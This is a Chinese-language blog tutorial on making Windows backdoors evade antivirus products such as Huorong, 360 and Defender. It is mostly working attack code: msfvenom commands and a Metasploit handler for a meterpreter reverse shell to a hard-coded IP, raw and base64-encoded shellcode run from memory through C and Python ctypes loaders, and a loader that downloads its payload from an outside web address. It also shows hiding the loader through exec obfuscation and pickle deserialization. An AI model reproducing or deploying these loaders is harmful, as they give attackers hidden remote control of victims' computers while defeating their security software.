免杀对抗-免杀Ctypes-饶过Shellcode&火绒&360&Defender

Hacker

免杀对抗

发布日期: 2022-07-13

作者: Shmily

文章字数: 1.7k

阅读时长: 9 分

阅读次数:

免杀对抗-免杀Ctypes-饶过Shellcode&火绒&360&Defender

python语言中的ctypes模块是一个专门用来做免杀应用的模块

一.加载器选择-ctypes-DLL引用&执行C代码

一般，我们生成的后门在实战中，上传上去都会被该肉鸡的杀毒软件给杀掉，所以免杀成为了我们必须掌握的知识之一。

我们可以通过生成DLL文件，然后用到python的ctypes模块去执行该DLL文件的后门，就可以相对绕过一些杀毒软件，说到这里有些朋友肯定就问了，在实战中，不是每个服务器都有python环境的呀？在这里我们当然就是将python代码编译成exe文件上传上去执行啦（可以用到pythoninstall&py2exe）

pythoninstall.exe -F -w 对应的dll文件

应用DLL载入执行：(载入DLL进行DLL代码函数调用执行)

C++:

extern "C" _declspec(dllexport) void TestCtypes() {

    printf("I like eating watermelon\n");

}



Python：

from ctypes import *



\#加载dll2.dll

lib=CDLL('dll2')

\#调用当前库方法

lib.TestCtypes()

打包器选择-C语言编译-MSF-C-电脑管家

1、管家各种过-火绒 defender查杀
msfvenom -p windows/meterpreter/reverse_tcp lhost=47.94.236.117 lport=6688 -f c
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6688
run
VS创建项目，添加C语言文件，添加执行代码并替换Shellcode，编译生成
#include <Windows.h>
#include <stdio.h>
#include <string.h>

#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口

unsigned char buf[] =
"\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\x49"
"\x75\xef\x52\x8b\x52\x10\x57\x8b\x42\x3c\x01\xd0\x8b\x40\x78"
"\x85\xc0\x74\x4c\x01\xd0\x8b\x48\x18\x50\x8b\x58\x20\x01\xd3"
"\x85\xc9\x74\x3c\x31\xff\x49\x8b\x34\x8b\x01\xd6\x31\xc0\xc1"
"\xcf\x0d\xac\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24"
"\x75\xe0\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c"
"\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59"
"\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xe9\x80\xff\xff\xff\x5d"
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26"
"\x07\x89\xe8\xff\xd0\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x0a\x68\x2f\x5e\xec\x75\x68\x02"
"\x00\x1a\x20\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea"
"\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61"
"\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x67\x00\x00"
"\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83"
"\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a"
"\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57"
"\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x28\x58\x68\x00"
"\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68"
"\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\x0f\x85\x70\xff"
"\xff\xff\xe9\x9b\xff\xff\xff\x01\xc3\x29\xc6\x75\xc1\xc3\xbb"
"\xf0\xb5\xa2\x56\x6a\x00\x53\xff\xd5";

main()

{
    char* Memory;

    Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

    memcpy(Memory, buf, sizeof(buf));

    ((void(*)())Memory)();

}

加密器选择-Python编译-MSF-C-bs64-Defender

利用思路：将Payload进行编码生成，Python解码后调用执行绕过。
pyinstaller打包-defender
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=ip lport=port -f c
Pycharm调用Ctypes模块解码调用C
pyinstaller.exe -F -w ms-py.py

import ctypes
import base64

encode_shellcode = '''\x2f\x4f\x69\x50\x41\x41\x41\x41\x59\x44\x48\x53\x5a\x49\x74
\x53\x4d\x49\x74\x53\x44\x49\x74\x53\x46\x49\x6e\x6c\x69\x33
\x49\x6f\x44\x37\x64\x4b\x4a\x6a\x48\x2f\x4d\x63\x43\x73\x50
\x47\x46\x38\x41\x69\x77\x67\x77\x63\x38\x4e\x41\x63\x64\x4a
\x64\x65\x39\x53\x56\x34\x74\x53\x45\x49\x74\x43\x50\x41\x48
\x51\x69\x30\x42\x34\x68\x63\x42\x30\x54\x41\x48\x51\x69\x31
\x67\x67\x41\x64\x4f\x4c\x53\x42\x68\x51\x68\x63\x6c\x30\x50
\x45\x6d\x4c\x4e\x49\x73\x42\x31\x6a\x48\x2f\x4d\x63\x43\x73
\x77\x63\x38\x4e\x41\x63\x63\x34\x34\x48\x58\x30\x41\x33\x33
\x34\x4f\x33\x30\x6b\x64\x65\x42\x59\x69\x31\x67\x6b\x41\x64
\x4e\x6d\x69\x77\x78\x4c\x69\x31\x67\x63\x41\x64\x4f\x4c\x42
\x49\x73\x42\x30\x49\x6c\x45\x4a\x43\x52\x62\x57\x32\x46\x5a
\x57\x6c\x48\x2f\x34\x46\x68\x66\x57\x6f\x73\x53\x36\x59\x44
\x2f\x2f\x2f\x39\x64\x61\x44\x4d\x79\x41\x41\x42\x6f\x64\x33
\x4d\x79\x58\x31\x52\x6f\x54\x48\x63\x6d\x42\x34\x6e\x6f\x2f
\x39\x43\x34\x6b\x41\x45\x41\x41\x43\x6e\x45\x56\x46\x42\x6f
\x4b\x59\x42\x72\x41\x50\x2f\x56\x61\x67\x70\x6f\x4c\x31\x37
\x73\x64\x57\x67\x43\x41\x42\x6f\x67\x69\x65\x5a\x51\x55\x46
\x42\x51\x51\x46\x42\x41\x55\x47\x6a\x71\x44\x39\x2f\x67\x2f
\x39\x57\x58\x61\x68\x42\x57\x56\x32\x69\x5a\x70\x58\x52\x68
\x2f\x39\x57\x46\x77\x48\x51\x4b\x2f\x30\x34\x49\x64\x65\x7a
\x6f\x5a\x77\x41\x41\x41\x47\x6f\x41\x61\x67\x52\x57\x56\x32
\x67\x43\x32\x63\x68\x66\x2f\x39\x57\x44\x2b\x41\x42\x2b\x4e
\x6f\x73\x32\x61\x6b\x42\x6f\x41\x42\x41\x41\x41\x46\x5a\x71
\x41\x47\x68\x59\x70\x46\x50\x6c\x2f\x39\x57\x54\x55\x32\x6f
\x41\x56\x6c\x4e\x58\x61\x41\x4c\x5a\x79\x46\x2f\x2f\x31\x59
\x50\x34\x41\x48\x30\x6f\x57\x47\x67\x41\x51\x41\x41\x41\x61
\x67\x42\x51\x61\x41\x73\x76\x44\x7a\x44\x2f\x31\x56\x64\x6f
\x64\x57\x35\x4e\x59\x66\x2f\x56\x58\x6c\x37\x2f\x44\x43\x51
\x50\x68\x58\x44\x2f\x2f\x2f\x2f\x70\x6d\x2f\x2f\x2f\x2f\x77
\x48\x44\x4b\x63\x5a\x31\x77\x63\x4f\x37\x38\x4c\x57\x69\x56
\x6d\x6f\x41\x55\x2f\x2f\x56
'''

shellcode = base64.b64decode(encode_shellcode)
#print(shellcode)

rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

加密器选择-Python编译-MSF-C-无Payload-火绒

利用思路：将Payload存放互联网资源上，通过爬虫获取后再进行编码，后续通过定位特征码形式找到关键代码查杀块，继续编码绕过。
pyinstaller打包-defender
msfvenom -p windows/meterpreter/reverse_tcp --encrypt base64 lhost=ip lport=port -f c
Pycharm调用Ctypes模块解码调用C
pyinstaller.exe -F -w ms-py-2.py

import ctypes
import requests
import base64

encode_shellcode = requests.get("http://www.xiaodi8.com/123.txt").text
shellcode = base64.b64decode(encode_shellcode)
#print(shellcode)

rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
func=base64.b64decode(b'Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSk=')
exec(func)
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

反序列化-Python免杀

先将执行上线的python代码进行序列化操作，
import pickle
import base64

shellcode = '''
import ctypes,base64
encode_shellcode=b'/OiJAAAAYInlMdJki1Iwi1IMi1IUi3IoD7dKJjH/McCsPGF8Aiwgwc8NAcfi8FJXi1IQi0I8AdCLQHiFwHRKAdBQi0gYi1ggAdPjPEmLNIsB1jH/McCswc8NAcc44HX0A334O30kdeJYi1gkAdNmiwxLi1gcAdOLBIsB0IlEJCRbW2FZWlH/4FhfWosS64ZdaG5ldABod2luaVRoTHcmB//VMf9XV1dXV2g6Vnmn/9XphAAAAFsxyVFRagNRUWi4IgAAU1BoV4mfxv/V63BbMdJSaAACQIRSUlJTUlBo61UuO//VicaDw1Ax/1dXav9TVmgtBhh7/9WFwA+EwwEAADH/hfZ0BIn56wloqsXiXf/VicFoRSFeMf/VMf9XagdRVlBot1fgC//VvwAvAAA5x3S3Mf/pkQEAAOnJAQAA6Iv///8veUlTRwCSVUrnb06Tl/bbisKMif4lfZ9slXUVr5+cG5srC1T4fLW65ks/DDOz82IafOBOwJclbGdnr4yhiNHQxphjbROB8peI7VY/1VtdAFVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChjb21wYXRpYmxlOyBNU0lFIDkuMDsgV2luZG93cyBOVCA2LjE7IFdPVzY0OyBUcmlkZW50LzUuMDsgTlAwODsgTUFBVTsgTlAwOCkNCgBt36bQMfc4U/WYbkyJcY+0LDn9Vwa9+UfZFcWSSn4OoSbEyXDdmOzbxpVKbstDjE62F9LnMUbgkwk5/Oex9Kjw8XALC3Hinx1aL1fhXt852VZaBp48ZLcI7faeJXJs7pIGde/8ErflpenoUHqx5Sf5c8ITZmw+oIqcilHK9DW4b7D8yX/HV2/Bzys58o1bzaYUhaLAPGxd/FX6qvcFrEh2nLpRFO18cgGBa8oTXlUJkAd78ifATC9YQzwHg/jlXBq2aJPkUfxRaABo8LWiVv/VakBoABAAAGgAAEAAV2hYpFPl/9WTuQAAAAAB2VFTiedXaAAgAABTVmgSloni/9WFwHTGiwcBw4XAdeVYw+ip/f//NDcuOTQuMjM2LjExNwAAAYag'
shellcode = base64.b64decode(encode_shellcode)
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)'''


class A(object):
    def __reduce__(self):
        return (exec, (shellcode,))  #exec ：执行shellcode中的代码


ret = pickle.dumps(A())  #将A方法 序列化
ret_base64 = base64.b64encode(ret)
print(ret_base64) #得到序列化加密后的代码



然后将序列化加密后的代码 反序列化 并调用执行即可，可做到一定的免杀效果
import base64,pickle,ctypes
shellcode=b'gANjYnVpbHRpbnMKZXhlYwpxAFiyBQAACmltcG9ydCBjdHlwZXMsYmFzZTY0CmVuY29kZV9zaGVsbGNvZGU9YicvT2lKQUFBQVlJbmxNZEpraTFJd2kxSU1pMUlVaTNJb0Q3ZEtKakgvTWNDc1BHRjhBaXdnd2M4TkFjZmk4RkpYaTFJUWkwSThBZENMUUhpRndIUktBZEJRaTBnWWkxZ2dBZFBqUEVtTE5Jc0IxakgvTWNDc3djOE5BY2M0NEhYMEEzMzRPMzBrZGVKWWkxZ2tBZE5taXd4TGkxZ2NBZE9MQklzQjBJbEVKQ1JiVzJGWldsSC80RmhmV29zUzY0WmRhRzVsZEFCb2QybHVhVlJvVEhjbUIvL1ZNZjlYVjFkWFYyZzZWbm1uLzlYcGhBQUFBRnN4eVZGUmFnTlJVV2k0SWdBQVUxQm9WNG1meHYvVjYzQmJNZEpTYUFBQ1FJUlNVbEpUVWxCbzYxVXVPLy9WaWNhRHcxQXgvMWRYYXY5VFZtZ3RCaGg3LzlXRndBK0V3d0VBQURIL2hmWjBCSW41Nndsb3FzWGlYZi9WaWNGb1JTRmVNZi9WTWY5WGFnZFJWbEJvdDFmZ0MvL1Z2d0F2QUFBNXgzUzNNZi9wa1FFQUFPbkpBUUFBNkl2Ly8vOHZlVWxUUndDU1ZVcm5iMDZUbC9iYmlzS01pZjRsZlo5c2xYVVZyNStjRzVzckMxVDRmTFc2NWtzL0RET3o4MklhZk9CT3dKY2xiR2RucjR5aGlOSFF4cGhqYlJPQjhwZUk3VlkvMVZ0ZEFGVnpaWEl0UVdkbGJuUTZJRTF2ZW1sc2JHRXZOUzR3SUNoamIyMXdZWFJwWW14bE95Qk5VMGxGSURrdU1Ec2dWMmx1Wkc5M2N5Qk9WQ0EyTGpFN0lGZFBWelkwT3lCVWNtbGtaVzUwTHpVdU1Ec2dUbEF3T0RzZ1RVRkJWVHNnVGxBd09Da05DZ0J0MzZiUU1mYzRVL1dZYmt5SmNZKzBMRG45VndhOStVZlpGY1dTU240T29TYkV5WERkbU96YnhwVktic3REakU2MkY5TG5NVWJna3drNS9PZXg5S2p3OFhBTEMzSGlueDFhTDFmaFh0ODUyVlphQnA0OFpMY0k3ZmFlSlhKczdwSUdkZS84RXJmbHBlbm9VSHF4NVNmNWM4SVRabXcrb0lxY2lsSEs5RFc0YjdEOHlYL0hWMi9CenlzNThvMWJ6YVlVaGFMQVBHeGQvRlg2cXZjRnJFaDJuTHBSRk8xOGNnR0JhOG9UWGxVSmtBZDc4aWZBVEM5WVF6d0hnL2psWEJxMmFKUGtVZnhSYUFCbzhMV2lWdi9WYWtCb0FCQUFBR2dBQUVBQVYyaFlwRlBsLzlXVHVRQUFBQUFCMlZGVGllZFhhQUFnQUFCVFZtZ1Nsb25pLzlXRndIVEdpd2NCdzRYQWRlVll3K2lwL2YvL05EY3VPVFF1TWpNMkxqRXhOd0FBQVlhZycKc2hlbGxjb2RlID0gYmFzZTY0LmI2NGRlY29kZShlbmNvZGVfc2hlbGxjb2RlKQpyd3hwYWdlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5WaXJ0dWFsQWxsb2MoMCwgbGVuKHNoZWxsY29kZSksIDB4MTAwMCwgMHg0MCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KHJ3eHBhZ2UsIGN0eXBlcy5jcmVhdGVfc3RyaW5nX2J1ZmZlcihzaGVsbGNvZGUpLCBsZW4oc2hlbGxjb2RlKSkKaGFuZGxlID0gY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5DcmVhdGVUaHJlYWQoMCwgMCwgcnd4cGFnZSwgMCwgMCwgMCkKY3R5cGVzLndpbmRsbC5rZXJuZWwzMi5XYWl0Rm9yU2luZ2xlT2JqZWN0KGhhbmRsZSwgLTEpcQGFcQJScQMu'  ##序列化后得到的代码
pickle.loads(base64.b64decode(shellcode))#调用pickle.loads（）会自动调用 __reduce__（）魔术方法，从而执行exec命令，做到上线功能